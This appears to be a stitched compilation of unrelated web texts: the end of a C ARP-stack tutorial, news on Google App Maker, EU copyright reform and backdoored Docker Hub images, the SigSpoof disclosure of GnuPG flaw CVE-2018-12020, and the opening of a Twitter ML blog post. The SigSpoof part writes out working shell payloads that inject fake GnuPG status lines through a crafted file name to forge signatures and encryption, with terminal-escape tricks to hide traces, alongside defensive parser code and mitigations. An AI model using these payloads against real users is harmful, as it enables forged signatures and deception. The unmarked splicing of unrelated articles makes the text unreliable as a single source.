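        if (!arp_table[i].used) free_slot = i;
    }
    return free_slot;
}

/* Cache lookup: returns 1 and fills mac_out when ip is known. */
int arp_lookup(uint32_t ip, unsigned char *mac_out)
{
    int i = arp_slot(ip);
    if (!arp_table[i].used || arp_table[i].ip != ip) return 0;
    memcpy(mac_out, arp_table[i].mac, 6);
    return 1;
}

/* Handle one received frame. Returns the reply length written to `out`,
 * 0 when no reply is due, -1 when the frame is not ARP-over-IPv4 we can
 * parse (wrong types, or too short for the casts below to be safe). */
int arp_incoming(const struct netdev *dev, const unsigned char *frame,
                 size_t len, unsigned char *out)
{
    const size_t need = sizeof(struct eth_hdr) + sizeof(struct arp_hdr)
                      + sizeof(struct arp_ipv4);          /* 14 + 8 + 20 */
    if (len < need) return -1;
    const struct eth_hdr *eth = (const struct eth_hdr *) frame;
    if (ntohs(eth->ethertype) != ETHERTYPE_ARP) return -1;
    /* "?Do I have the hardware type in ar$hrd?" / "?Do I speak ar$pro?" */
    const struct arp_hdr *arp = (const struct arp_hdr *) eth->payload;
    if (ntohs(arp->hwtype) != ARP_HW_ETHER || arp->hwsize != 6) return -1;
    if (ntohs(arp->protype) != ARP_PRO_IPV4 || arp->prosize != 4) return -1;

    /* Merge step: refresh the sender's entry if we already have one. */
    const struct arp_ipv4 *req = (const struct arp_ipv4 *) arp->data;
    int i = arp_slot(req->sip);
    int merge_flag = arp_table[i].used && arp_table[i].ip == req->sip;
    if (merge_flag) memcpy(arp_table[i].mac, req->smac, 6);

    /* "?Am I the target protocol address?" If so, learn an unknown sender. */
    if (req->dip != dev->addr) return 0;
    if (!merge_flag) {
        arp_table[i].used = 1; arp_table[i].ip = req->sip;
        memcpy(arp_table[i].mac, req->smac, 6);
    }

    /* "?Is the opcode ares_op$REQUEST?" (only NOW look at the opcode) */
    if (ntohs(arp->opcode) != ARP_OP_REQUEST) return 0;

    /* Swap the fields, putting our own addresses in the sender slots. */
    memcpy(out, frame, need);
    struct eth_hdr *reth = (struct eth_hdr *) out;
    struct arp_hdr *rarp = (struct arp_hdr *) reth->payload;
    struct arp_ipv4 *rep = (struct arp_ipv4 *) rarp->data;
    memcpy(rep->dmac, req->smac, 6);   rep->dip = req->sip;
    memcpy(rep->smac, dev->hwaddr, 6); rep->sip = dev->addr;
    rarp->opcode = htons(ARP_OP_REPLY);
    memcpy(reth->dmac, req->smac, 6);
    memcpy(reth->smac, dev->hwaddr, 6);
    return (int) need;
}

/* Constructed sample input (byte offsets follow the structs above): broadcast
 * request "who has 10.0.0.4? tell 192.168.1.32" from MAC 02:11:22:33:44:55. */
const unsigned char SAMPLE_REQUEST[42] = {
    0xff,0xff,0xff,0xff,0xff,0xff, 0x02,0x11,0x22,0x33,0x44,0x55, 0x08,0x06,
    0x00,0x01, 0x08,0x00, 0x06, 0x04, 0x00,0x01,
    0x02,0x11,0x22,0x33,0x44,0x55, 192,168,1,32,
    0x00,0x00,0x00,0x00,0x00,0x00, 10,0,0,4 };
```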

Finally, the ultimate test for an ARP implementation is to see whether it replies to ARP requests correctly:

[saminiir@localhost lvl-ip]$ arping -I tap0 10.0.0.4
ARPING 10.0.0.4 from 192.168.1.32 tap0
Unicast reply from 10.0.0.4 [00:0C:29:6D:50:25]  3.170ms
Unicast reply from 10.0.0.4 [00:0C:29:6D:50:25]  13.309ms
[saminiir@localhost lvl-ip]$ arp
Address                  HWtype  HWaddress           Flags Mask            Iface
10.0.0.4                 ether   00:0c:29:6d:50:25   C                     tap0

The kernel’s networking stack recognized the ARP reply from our custom networking stack, and consequently populated its ARP cache with the entry of our virtual network device. Success!

The minimal implementation of Ethernet frame handling and ARP is relatively easy and can be done in a few lines of code. On the other hand, the reward factor is quite high, since you get to populate a Linux host’s ARP cache with your own make-believe Ethernet device!

The source code for the project can be found on GitHub.

In the next post, we’ll continue the implementation with ICMP echo & reply (ping) and IPv4 packet parsing.

If you liked this post, you can share it with your followers and follow me on Twitter!

Kudos to Xiaochen Wang, whose similar implementation proved invaluable for me in getting up to speed with C network programming and protocol handling. I find his source code easy to understand and some of my design choices were straight-out copied from his implementation.

App Maker, Google’s low-code tool for building business apps, comes out of beta


It’s been a year and a half since Google announced App Maker, its online tool for quickly building and deploying business apps on the web. The company has mostly remained quiet about App Maker ever since and kept it in a private preview mode, but today, it announced that the service is now generally available and open to all developers who want to give it a try.

Access to App Maker comes with any G Suite Business and Enterprise subscription, as well as the G Suite for Education edition. The overall idea here is to help virtually anybody in an organization — including those with little to no coding experience — to build their own line-of-business apps based on data that’s already stored in G Suite, Google’s Cloud SQL database or any other database that supports JDBC or that offers a REST API (though that’s obviously a bit more of an advanced operation).


To do this, App Maker provides users with a low-code application development environment that lets you build applications through a straightforward drag and drop environment. Though it takes a bit of work to set up the database connectivity, once that’s done, the actual design part looks to be pretty easy — and thanks to a set of responsive templates, those final applications should work, no matter whether you are on a phone or desktop.

While many applications will likely rely on a database, it’s worth noting that developers can access Gmail, Google Calendar, Sheets and other data sources as well. In total, App Maker offers access to 40 Google Services. Unlike other low-code services like Mendix, K2 or even Microsoft’s PowerApps tools, Google’s App Maker seems to focus mostly on Google’s own services and doesn’t offer built-in connectivity with third-party services like Salesforce, for example. Chances are, of course, that now that App Maker is out of preview, Google will start adding more functionality to the service.

EU copyright reforms draw fire from scientists


An influential committee of the European Parliament is due to vote this month on changes to copyright regulations in the European Union, but the latest drafts of the rules have triggered a wave of criticism from open-science advocates. They say that the proposals will stifle research and scholarly communication.

Intellectual-property experts agree that existing EU copyright rules need an overhaul for the digital age, and a proposal first circulated by the European Commission in 2016 had this goal in mind. But critics worry that some provisions in more-recent proposals for the law — known as the directive on copyright in the digital single market — conflict with Europe’s principles of open science and freedom of expression.

“Copyright law must not hamper open science,” says Vanessa Proudman, European director of the Scholarly Publishing and Academic Resources Coalition (SPARC), a science-advocacy group in Apeldoorn, the Netherlands. “The EU has made significant headway towards open access of research funded by European citizens. The proposed new rules would clearly impede further progress, threatening the visibility of Europe’s research,” she says.

Concerns focus on a provision that would let publishers claim royalties for the use of snippets of information, such as tables or headlines. This was included with the aim of enabling news publishers to secure revenue from social-media platforms such as Facebook and Google. But a proposal added by a European Parliament committee would mean that the provision also applies to academic publications.

Many scholarly publishers, including the International Association for Scientific, Technical and Medical Publishers (STM), based in Oxford, UK, support this amendment. But open-research advocates say that facts and information in a scientific article must remain free from copyright. “We really don’t want further paywalls on top of any research materials libraries have paid for already,” says Maria Rehbinder, a copyright specialist in Finland with the Association of European Research Libraries.

Some researchers express concern that the proposed rule might even force scientists to pay fees to publishers for references they include in their own publications. But STM “cannot envisage any situation where students and researchers would need to pay fees” for citations, says Matt McKay, a spokesperson for the association.

Extra burdens

The EU copyright law, as written, would also compel repositories of research articles to prevent uploads of copyrighted papers and other content. Currently, the onus is on academic publishers to issue take-down notices for papers illegally posted to repositories.

The scholarly social network ResearchGate, for example, has in recent months disabled public access to more than 1.7 million papers on its site, in compliance with take-down messages by publishers. This process of removing articles upon request, says Proudman, works well and effectively for institutional repositories. Forcing all existing non-profit educational and research-data services, including more than 1,000 university repositories, to seek copyright licences and install upload filters would overburden most institutions, she says. “The proposed level of surveillance would put science repositories in the same boat as Facebook or YouTube,” she says, by requiring them to scan submissions for possible copyright violations.

The proposed rules aren’t all bad news for science, says Marie Timmermann, who is in charge of EU legislation and regulatory affairs at Science Europe, an association of national research-funding agencies in Brussels. Text-mining — whereby researchers use computer programs to extract data automatically from large numbers of texts — is exempted from the copyright law, when carried out in the public interest. Scientists at public research organizations would be allowed to harvest facts and data from all sources they have legal access to read.

However, this exemption does not extend to companies — a possible problem for EU-funded research projects, which increasingly include commercial partners, Timmermann notes.

The European Parliament legal committee’s vote on the law, scheduled for 23–24 April, will be a crucial test of whether lawmakers are listening to scientists’ concerns. The precise version the committee will consider has not yet been finalized and circulated, and the final law will also need to be approved by the entire parliament and by EU member states before it can come into effect, due for next year. “For the sake of European research, we hope the worst flaws will yet be deleted,” Timmermann says.


Backdoored images downloaded 5M times removed from Docker Hub


A single person or group may have made as much as $90,000 over 10 months by spreading 17 malicious images that were downloaded more than 5 million times from Docker Hub, researchers said Wednesday. The repository finally removed the submissions in May, more than eight months after receiving the first complaint.

Docker images are packages that typically include a pre-configured application running on top of an operating system. By downloading them from Docker Hub, administrators can save huge amounts of set-up time. Last July and August one or more people used the Docker Hub account docker123321 to upload three publicly available images that contained surreptitious code for mining cryptocurrencies. In September, a GitHub user complained one of the images contained a backdoor.

Neither the Docker Hub account nor the malicious images it submitted were taken down. Over the coming months, the account went on to submit 14 more malicious images. The submissions were publicly called out two more times, once in January by security firm Sysdig and again in May by security company Fortinet. Eight days after last month's report, Docker Hub finally removed the images. The following image, provided by security firm Kromtech, shows the chronology of the campaign.

By the time Docker Hub removed the images, they had received 5 million “pulls.” A wallet address included in many of the submissions showed it had mined almost 545 Monero digital coins, worth almost $90,000.

The malicious image campaign, detailed in a blog post published Wednesday by security firm Kromtech, provides a cautionary tale for developers.

“For ordinary users, just pulling a Docker image from Docker Hub is like pulling arbitrary binary data from somewhere, executing it, and hoping for the best without really knowing what’s in it,” the researchers wrote.

They went on to warn that, despite the images being pulled from Docker Hub, many servers that installed the images may still be infected. The researchers also said that the malware may continue to run even after administrators think they’ve deleted the malicious image. Wednesday’s post includes the names of all 17 of the packages. Anyone who installed one should take time to analyze their computers for signs of infection.

SigSpoof: Spoofing Signatures in GnuPG, Enigmail, GPGTools and Python-Gnupg


(Marcus Brinkmann)

GnuPG, Enigmail, GPGTools and potentially other applications using GnuPG can be attacked with in-band signaling similar to phreaking phone lines in the 1970s (“Cap’n Crunch”). We demonstrate this by creating messages that appear to be signed by arbitrary keys.

Previously, we showed how to spoof “encrypted” messages that were not actually encrypted. This time, we spoof “signed” messages that are not actually signed. And we show another way to spoof encryption, too.

This work would not have been possible without the collaboration with Kai Michaelis on CVE-2012-12019 at the Bochumer hacker space Das Labor. Fabian Ising from FH Münster verified the attack against GPGTools, Simon Wörner helped with the CVE. Thanks also to all the other people who gave me guidance and support behind the scenes!

tl;dr

I found a severe vulnerability in GnuPG, Enigmail, GPGTools and python-gnupg:

CVE-2018-12020: The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a “--status-fd 2” option, which allows remote attackers to spoof arbitrary signatures via the embedded “filename” parameter in OpenPGP literal data packets, if the user has the verbose option set in their gpg.conf file.

If you are a user:

If you are a developer:

NeoPG is not vulnerable. I removed support for embedded filenames on Oct 12 2017 because I considered it to be a dangerous and obsolete feature in OpenPGP.

NeoPG wants to provide a stable and extensible programming API to make it easier to implement OpenPGP support in applications securely. Currently, NeoPG is unfunded. If you like my work, you can find ways to support me at the bottom of the page!

Identifiers

This vulnerability is tracked under the following identifiers:

Distribution updates for GnuPG:

Demonstrating the signature spoof

The screenshots below are from Enigmail and GPGTools, and apparently show a message with a valid signature (in the first case by Patrick Brunschwig, the Enigmail author). In reality, this message is an encrypted message without any signature at all.

Root cause: Status message injection through embedded filename

This method relies on synergy between two unrelated weak design choices (or oversights) in GnuPG 2.2.7 and some applications:

  • Some applications call GnuPG with --status-fd 2 such that stderr and the status messages are combined in a single data pipe. These applications try to separate the output lines afterwards based on the line prefix (which is [GNUPG:] for status messages and gpg: for stderr).
  • GnuPG, with verbose enabled (either directly on the command line or indirectly through the gpg.conf configuration file), prints the “name of the encrypted file” (an obscure feature of OpenPGP under the control of the attacker) to stderr without escaping newline characters.

The attacker can inject arbitrary (fake) GnuPG status messages into the application parser to spoof signature verification and message decryption results. The attacker can control the key ids, algorithm specifiers, creation times and user ids, and does not need any of the private or public keys involved.

The only limitation is that all status messages need to fit into 255 characters, which is the limit for the “name of the encrypted file” in OpenPGP.

Here is how to create a message that looks signed in Enigmail, but is not actually signed (replace VICTIM_KEYID by the desired recipient):

$ echo 'Please send me one of those expensive washing machines.' \
| gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

Analyzing the message with GnuPG (with --verbose) leads to the following output:

$ cat poc1.msg | gpg --status-fd 2 --verbose
... (lots of output snipped) ...
gpg: original file name=''
[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>
[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B
[GNUPG:] TRUST_FULLY 0 classic
gpg: ''
[GNUPG:] PLAINTEXT 62 1528297411 '%0A[GNUPG:]%20GOODSIG%20DB1187B9DD5F693B%20Patrick%20Brunschwig%20<patrick@enigmail.net>%0A[GNUPG:]%20VALIDSIG%204F9F89F5505AC1D1A260631CDB1187B9DD5F693B%202018-05-31%201527721037%200%204%200%201%2010%2001%204F9F89F5505AC1D1A260631CDB1187B9DD5F693B%0A[GNUPG:]%20TRUST_FULLY%200%20classic%0Agpg:%20'
[GNUPG:] PLAINTEXT_LENGTH 56
... (more output snipped) ...

The application processes the output line by line:

  • Lines starting with gpg: are ignored.
  • GOODSIG will convince the application that the message is signed.
  • VALIDSIG gives additional information about the signature, such as creation time, algorithm identifiers, and the long fingerprint.
  • TRUST_FULLY indicates that the user trusts the key. This line may be omitted if the attacker knows that the recipient has not certified the spoofed signing key.

Normally, GnuPG emits many more status messages for a signed message, but applications usually do not pay much attention to those other messages, and do not fail if these are omitted.
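The root cause is easiest to see with both halves side by side. As an added example (not GnuPG's, Enigmail's or python-gnupg's code), the block below models the verbose “original file name” diagnostic before and after the filename is sanitised, and the prefix-based line classifier that an application using --status-fd 2 runs over the shared pipe; the spoofed filename, the key id in it and the sample status lines are all constructed placeholders.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define STATUS_PREFIX "[GNUPG:] "
#define PREFIX_LEN    (sizeof(STATUS_PREFIX) - 1)

/* Constructed attacker-chosen "original file name": a newline, a fake status
 * line, then a "gpg: " prefix so GnuPG's closing quote lands on a log line. */
const char SPOOFED_NAME[] =
    "\n[GNUPG:] GOODSIG 0123456789ABCDEF Spoofed Name <spoof@example.invalid>"
    "\ngpg: ";

/* Pre-fix diagnostic (modelled on GnuPG <= 2.2.7 with --verbose): raw name. */
size_t log_filename_raw(char *out, size_t cap, const char *name)
{
    return (size_t) snprintf(out, cap, "gpg: original file name='%s'\n", name);
}

/* Post-fix diagnostic (modelled on the sanitising GnuPG 2.2.8 added for this
 * line): control characters are escaped, so the name cannot start a new line. */
size_t log_filename_sanitized(char *out, size_t cap, const char *name)
{
    size_t n = (size_t) snprintf(out, cap, "gpg: original file name='");
    for (; *name && n + 6 < cap; name++) {
        unsigned char c = (unsigned char) *name;
        if (c == '\n')       n += (size_t) snprintf(out + n, cap - n, "\\n");
        else if (c == '\r')  n += (size_t) snprintf(out + n, cap - n, "\\r");
        else if (iscntrl(c)) n += (size_t) snprintf(out + n, cap - n, "\\x%02x", c);
        else                 out[n++] = (char) c;
    }
    n += (size_t) snprintf(out + n, cap - n, "'\n");
    return n;
}

/* What an application that passes "--status-fd 2" reads for an UNSIGNED
 * message: the verbose log line, then GnuPG's genuine status lines. The
 * filename argument of PLAINTEXT is omitted here (it is percent-escaped in
 * real output and was never the problem). Sample lines are constructed. */
size_t build_fd2_stream(char *out, size_t cap, int sanitized, const char *name)
{
    size_t n = sanitized ? log_filename_sanitized(out, cap, name)
                         : log_filename_raw(out, cap, name);
    n += (size_t) snprintf(out + n, cap - n,
            "[GNUPG:] PLAINTEXT 62 1528297411\n[GNUPG:] PLAINTEXT_LENGTH 56\n");
    return n;
}

struct verify_result { int goodsig; char keyid[17]; };

/* The vulnerable consumer pattern: one pipe, every line classified by its
 * prefix. "gpg: " lines are dropped as log noise, "[GNUPG:] " lines are
 * trusted as status. Nothing here can tell a genuine status line from an
 * injected one; the consumer-side fix is a dedicated status descriptor so
 * that this classifier never runs over log text at all. */
void parse_shared_stream(const char *stream, struct verify_result *r)
{
    memset(r, 0, sizeof *r);
    for (const char *p = stream; *p; ) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t) (eol - p) : strlen(p);
        if (len > PREFIX_LEN && strncmp(p, STATUS_PREFIX, PREFIX_LEN) == 0) {
            const char *kw = p + PREFIX_LEN;
            if (len - PREFIX_LEN > 8 && strncmp(kw, "GOODSIG ", 8) == 0) {
                r->goodsig = 1;
                size_t i = 0;                      /* copy the long key id */
                for (; i < 16 && kw + 8 + i < p + len && kw[8 + i] != ' '; i++)
                    r->keyid[i] = kw[8 + i];
                r->keyid[i] = '\0';
            }
        }
        if (!eol) break;
        p = eol + 1;
    }
}
```

With the raw diagnostic the classifier reports a GOODSIG for a message that carries no signature; with the sanitised diagnostic the same input stays a single log line and no signature is reported.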

Proof of concept II: Signature and Encryption spoof (Enigmail)

The attack is very powerful, and the message does not even need to be encrypted at all. A single literal data (aka “plaintext”) packet is a perfectly valid OpenPGP message, and already contains the “name of the encrypted file” used in the attack, even though there is no encryption.

As a consequence, we can spoof the encryption as well. But because we need to inject more status messages, we need to drop some information that is unused in the application to make more space for what is needed.

Here is an example of a message that looks signed and encrypted in Enigmail, but is in fact neither. We use a shorter version of VALIDSIG which is compatible with an older version of GnuPG that is still supported by Enigmail, and add just enough status messages to spoof an encrypted message for the signature.

echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

This is how this message is displayed in Enigmail (if verbose is enabled in gpg.conf):

There is one advantage to this method:

  • The attacker does not need the public key of the recipient, only the key id.

There are some disadvantages, too:

  • The message looks more suspicious under forensic analysis. For example, a virus scanner could be enabled to detect this attack.
  • The victim might notice that they are able to view the message without providing a passphrase or security token.

Proof of concept III: Signature spoof on the command line

It is well known that email clients and other graphical user interfaces to GnuPG provide a larger attack surface than using GnuPG on the command line. For example, during the EFAIL vulnerability window, the EFF recommended using the command line to read messages “in as safe a way as possible” on Linux, Windows and MacOS.

One of the few safe ways to verify signatures on the command line is documented in “The GNU Privacy Handbook”:

To verify the signature and extract the document use the --decrypt option. The signed document to verify and recover is input and the recovered document is output.

blake% gpg --output doc --decrypt doc.sig
gpg: Signature made Fri Jun  4 12:02:38 1999 CDT using DSA key ID BB7576AC
gpg: Good signature from "Alice (Judge) <alice@cyb.org>"

Unfortunately, the attack might even work on the command line. Here we demonstrate how to get very close to spoofing signatures on the command line following the recommended decryption procedure, in a way that is portable across all operating systems and terminal types:

echo 'meet me at 10am' | gpg --armor --store --set-filename "`echo -ne msg\''\
\ngpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST\
\ngpg:                using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677\
\ngpg:                issuer "bill@eff.org"\
\ngpg: Good signature from "William Budington <bill@eff.org>" [full] '\''msg'`" > poc3.msg

When reading the message, the victim sees the following output (if verbose is enabled in gpg.conf):

$ gpg --output poc3.txt -d poc3.msg 
gpg: original file name='msg'
gpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST
gpg:                using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677
gpg:                issuer "bill@eff.org"
gpg: Good signature from "William Budington <bill@eff.org>" [full] 'msg'
$ cat poc3.txt
meet me at 10am

The result is not a perfect match to the usual (no-verbose) output, but it is dangerously close. The main differences are:

  • The first line indicates an “original file name”, which is uncommon. But the line shown is identical to that of a message which actually has an “original file name” of msg.
  • The last line has an extra 'msg', because the attacker needs to hide the final apostrophe output by GnuPG. This is suspicious, but the victim might rationalise it by correlating it to the original file name message.

A more sophisticated attack might use terminal capabilities to move the cursor and control the output color to hide some of these problems. This example works on terminals supporting ANSI/VT-100 escape sequences:

echo 'meet me at 10am' | gpg --armor --store --set-filename "`echo -ne \''\
\rgpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST\
\ngpg:\t\t    using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677\
\ngpg:\t\t    issuer "bill@eff.org"\
\ngpg: Good signature from "William Budington <bill@eff.org>" [full]\e[200C\e[1;37m'`"

Here we are using several advanced tricks:

  • \r moves the cursor back to the beginning of the “original file name” line, allowing us to overwrite it.
  • \e[200C pushes the single apostrophe 200 characters to the right, i.e. to the end of the line.
  • \e[1;37m makes the single apostrophe bright white (assuming the user’s prompt will reset the color settings).

I have tried this on my standard terminal with the color scheme and prompt I use regularly, and although the terminal does distinguish “bright white” characters from the background color, the above approach hides the apostrophe quite well among the smudges on my screen.

Is verbose enabled?

By default, verbose is not enabled, but several recommended configurations for GnuPG include it, e.g. cooperpair sane defaults, Ultimate GPG Settings (via Schneier’s Blog) and Ben’s IT-Kommentare. Expert users might be interested in the additional details that verbose provides, and beginners might run into problems that require verbose to solve.

Some applications, such as Evolution, add --verbose to GnuPG invocations unconditionally, and a forward-thinking attacker could try to submit a “helpful patch” to Enigmail or GPGTools that adds --verbose to the list of command line options “to make debugging easier.”

Impact: Vulnerable applications and libraries

We have seen how to inject arbitrary status messages into applications using GnuPG to spoof signed and/or encrypted messages. The only assumptions we made were:

  • The application using GnuPG calls it with --status-fd 2, which causes log and status messages to be interspersed on the same output channel.
  • The --verbose setting is in effect when GnuPG is called, for example because verbose is included in the user’s gpg.conf configuration file for GnuPG.

We found that the following applications or libraries use --status-fd 2 and do not use --no-verbose, and thus are vulnerable to the attack if the user has verbose in gpg.conf:

Any software that calls gpg or gpgv with --status-fd 2 is potentially affected, unless it also adds --no-verbose.

Critical infrastructure at risk

The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure. GnuPG is not only used for email security, but also to secure backups, software updates in distributions, and source code in version control systems like Git.

In the course of a due diligence investigation over two weeks to assess the impact of the vulnerability, I have found several near misses:

  • Gnome Evolution, a popular email client, uses --verbose by default, but does use a status file descriptor separate from stderr. So it is not vulnerable to this attack.
  • Git verify-commit uses --status-fd 2 to create signatures, but it uses --status-fd 1 to verify (detached) signatures. Due to this happy circumstance it is not vulnerable to this attack.
  • Likewise, Gemato, used in Gentoo to verify package signatures, also uses --status-fd 1 to verify detached signatures, and is not vulnerable to this attack.
  • Mutt config files for GnuPG support use --status-fd 2 and pattern matching, but add --no-verbose, too. Users with this configuration are not vulnerable to this attack.

If you use GnuPG in your application, you should verify that you are not affected, and consider some mitigations if you are.

Mitigations

For Users

For developers

  • Upgrade to python-gnupg 0.4.3.
  • Call gpg with --no-verbose, which defeats the attack.
  • Use a dedicated pipe for --status-fd, and do not share it with stderr.
  • If this is not easy (or even possible) due to the framework or target platform, consider --batch --log-file FILE to redirect the stderr output, where FILE can be /dev/null, too. Thanks to Patrick Brunschwig for this idea!
  • Alternatively, the --status-file FILE option can be used to direct the status lines to a temporary file.
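As an added illustration of the two assumptions listed under “Impact” and of the dedicated-pipe mitigation above (example code written for this page, not part of the original post or of any of the applications it names), the Python below contains the kind of status parser a GnuPG frontend runs, feeds it first a constructed stderr capture in which a crafted file name has injected a GOODSIG line, then the status channel alone, and wraps gpg so that --status-fd points at a pipe the parent owns. The key id, user id and sample output are placeholders, not real gpg output; gpg itself is only invoked from the __main__ block.

```python
"""Read GnuPG status lines from a dedicated pipe instead of stderr.

Added example, not code from the original post.  The sample texts below
are constructed; the key id and user id in them are placeholders.
"""
import os
import subprocess
import threading
from typing import List, Tuple

STATUS_PREFIX = "[GNUPG:] "


def parse_status(text: str) -> List[Tuple[str, str]]:
    """Split status output into (KEYWORD, arguments) pairs.

    This is the parser a mail client or password manager effectively runs.
    It trusts every line carrying the prefix, so it must only ever see the
    status channel, never a channel an attacker can get text into.
    """
    parsed = []
    for line in text.splitlines():
        if line.startswith(STATUS_PREFIX):
            keyword, _, args = line[len(STATUS_PREFIX):].partition(" ")
            parsed.append((keyword, args))
    return parsed


def has_good_signature(status: List[Tuple[str, str]]) -> bool:
    return any(keyword == "GOODSIG" for keyword, _ in status)


def looks_like_injection(log_text: str) -> bool:
    """Log output should never contain the status prefix; if it does, a
    logged string (such as a file name) is trying to impersonate a status line."""
    return STATUS_PREFIX in log_text


# Constructed: what an application using --status-fd 2 reads when verbose is
# on and the embedded file name carries raw newlines (pre-2.2.8 GnuPG).
INJECTED_STDERR = (
    "gpg: original file name='\n"
    "[GNUPG:] GOODSIG 0123456789ABCDEF Alice <alice@example.org>\n"
    "[GNUPG:] TRUST_FULLY 0 pgp\n"
    "'\n"
    "[GNUPG:] PLAINTEXT_LENGTH 16\n"
)

# Constructed: the same unsigned message read over a dedicated status pipe;
# the log line never reaches this channel, so no GOODSIG appears.
GENUINE_STATUS = "[GNUPG:] PLAINTEXT_LENGTH 16\n"


def run_gpg(args: List[str], gpg: str = "gpg") -> Tuple[int, str, str]:
    """Run gpg with --status-fd on its own pipe; return (rc, status, stderr)."""
    read_end, write_end = os.pipe()
    proc = subprocess.Popen(
        [gpg, "--batch", "--no-verbose", "--status-fd", str(write_end), *args],
        stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
        pass_fds=(write_end,), text=True)
    os.close(write_end)  # only gpg holds the write end now, so EOF follows its exit
    chunks: List[str] = []

    def drain() -> None:
        # Read concurrently with communicate() so neither pipe fills and stalls gpg.
        with os.fdopen(read_end, "r") as status_pipe:
            chunks.append(status_pipe.read())

    reader = threading.Thread(target=drain)
    reader.start()
    _, err = proc.communicate()
    reader.join()
    return proc.returncode, "".join(chunks), err


if __name__ == "__main__":
    import sys
    rc, status, err = run_gpg(["--verify", *sys.argv[1:]])
    print("good signature:", has_good_signature(parse_status(status)))
    if looks_like_injection(err):
        print("warning: status prefix found in log output", file=sys.stderr)
```

The same parser returns a forged GOODSIG when it is pointed at the shared stderr text and nothing when it only sees the status pipe; the looks_like_injection check is a cheap extra alarm for log output that should never carry the prefix.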

For GnuPG developers

  • GnuPG should not emit the original file name log message (it is redundant with the PLAINTEXT status message).
  • Instead of removing the log messages, GnuPG 2.2.8 at least properly escapes newline characters in the filename.
  • GnuPG could check if stderr and the status fd are the same file descriptor, and abort operation in that case. This is a breaking change, but it will prevent similar problems in the future.

11 Jun 2018

  • heise Security: Verschlüsselung: GnuPG verschärft Integritäts-Checks (Jürgen Schmidt) “The author of an encrypted e-mail can choose the names of the files it contains quite freely. GnuPG failed to check these sufficiently, so an attacker could embed, among other things, line breaks and control characters, which GnuPG then printed together with its status messages. In this way an attacker could, for example, fake a successful signature check to a program.”

12 Jun 2018

13 Jun 2018

  • golem.de: Signaturen fälschen mit GnuPG (Hanno Böck) “A security vulnerability in the interplay between GnuPG and certain mail plugins makes it possible, under certain circumstances, to trick the signature check. The reason: tools and mail plugins built on GnuPG parse the output of the command-line tool, and under some circumstances valid-looking status messages can be smuggled into it.”

14 Jun 2018


Twitter meets TensorFlow


Machine learning enables Twitter to drive engagement, surface content most relevant to our users, and promote healthier conversations. As part of its purpose of advancing AI for Twitter in an ethical way, Twitter Cortex is the core team responsible for facilitating machine learning endeavors within the company. With first-hand experience running machine learning models in production, Cortex seeks to streamline difficult ML processes, freeing engineers to focus on modeling, experimentation, and user experience. Our mission is to empower internal teams to efficiently leverage artificial intelligence by providing a platform and unifying, educating, and advancing the state of the art in ML technologies within Twitter. Indeed, Cortex is Twitter’s ML platform team.

In this blog post, we will discuss the history, evolution, and future of our modeling/testing/serving framework, internally referred to as Deepbird, applying ML to Twitter data, and the challenges of serving ML in production settings. Indeed, Twitter handles large amounts of data and custom data formats. Twitter has a specific infrastructure stack, latency constraints, and a large request volume.

The Twitter ML Platform encompasses the ML tools and services Cortex provides to accomplish our mission. The ML Platform provides tools that span the full ML spectrum, from dataset preparation, to experimentation, to deploying models to production. The subject of this blog post is only one of the components of this platform, internally designated DeepBird. This framework is for training and productionising deep learning models; it is implemented in Python on TensorFlow (v2), having earlier been built on Lua Torch (v1). The framework has undergone various changes since the summer of 2017, and we wanted to share our experience here.

Twitter acquired Madbits in 2014 to bring deep learning expertise in-house. After successfully applying this technology to derive better content understanding in images, the team became Cortex mid-2015. Cortex grew with the integration of people from other teams, and other acquisitions. The original mission was to refine and transform Twitter’s product with state-of-the-art AI capabilities. Starting mid-2016, the team’s goals shifted to unifying and improving the usage of AI for all Twitter engineers, that is, build a “machine learning” platform. In that context, DeepBird (based on Lua Torch) became the first project to meet broad internal adoption, leading to significant product gains. Some of these gains are described in Using Deep Learning at Scale in Twitter's Timeline. Cortex later grew to integrate others from the company and from other acquisitions like TellApart, Gnip and Magic Pony.

DeepBird is an end-to-end solution for training and serving deep learning models at scale. In order to ease the transition from an existing internal machine learning framework that was using YAML configuration files, its configurations were also written in YAML. The data was expected to be encoded in an internal DataRecord format, which conveniently handles sparse feature configuration.

In the summer of 2017, given the migration of the Torch community from Lua to Python via PyTorch, and subsequent waning support for Lua Torch, Cortex began evaluating alternatives to Lua Torch. After careful consideration of frontrunners PyTorch and TensorFlow, we decided to migrate DeepBird to the latter. The primary deciding factor was that TensorFlow had much better support for serving models in production.

